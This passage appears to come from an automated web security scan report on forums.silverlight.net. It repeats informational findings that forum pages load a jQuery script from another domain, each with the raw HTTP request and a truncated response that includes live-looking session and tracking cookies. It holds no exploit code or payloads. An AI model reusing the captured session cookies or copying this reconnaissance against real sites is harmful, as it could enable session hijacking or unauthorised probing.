Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:23 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Hostin
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.73. http://forums.silverlight.net/forums/16.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/16.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/16.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72987
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Progra
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.74. http://forums.silverlight.net/forums/17.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/17.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/17.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76509
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Progra
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.75. http://forums.silverlight.net/forums/18.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/18.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/18.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73765
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:34 GMT; expires=Sun, 29-Jan-2012 23:17:34 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Visual
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.76. http://forums.silverlight.net/forums/19.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/19.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/19.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73133
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:15 GMT; expires=Sun, 29-Jan-2012 23:18:15 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:15 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Design
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.77. http://forums.silverlight.net/forums/20.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/20.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/20.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 71471
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:22 GMT; expires=Sun, 29-Jan-2012 23:18:22 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:23 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Video
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.78. http://forums.silverlight.net/forums/21.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/21.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/21.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 64982
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:47 GMT; expires=Sun, 29-Jan-2012 23:18:47 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Expres
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.79. http://forums.silverlight.net/forums/25.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/25.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/25.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 66083
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Feedba
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.80. http://forums.silverlight.net/forums/28.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/28.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/28.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76750
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:40 GMT; expires=Sun, 29-Jan-2012 23:17:40 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Report
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.81. http://forums.silverlight.net/forums/35.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/35.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/35.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76441
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:33 GMT; expires=Sun, 29-Jan-2012 23:17:33 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.82. http://forums.silverlight.net/forums/46.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/46.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/46.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72228
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:51 GMT; expires=Sun, 29-Jan-2012 23:17:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Access
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.83. http://forums.silverlight.net/forums/51.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/51.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/51.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 68826
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   New Fe
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.84. http://forums.silverlight.net/forums/52.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/52.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/52.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 68254
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:00 GMT; expires=Sun, 29-Jan-2012 23:18:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Game D
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.85. http://forums.silverlight.net/forums/53.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/53.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/53.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73495
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:54 GMT; expires=Sun, 29-Jan-2012 23:17:54 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:54 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   WCF RI
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.86. http://forums.silverlight.net/forums/56.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/56.aspx

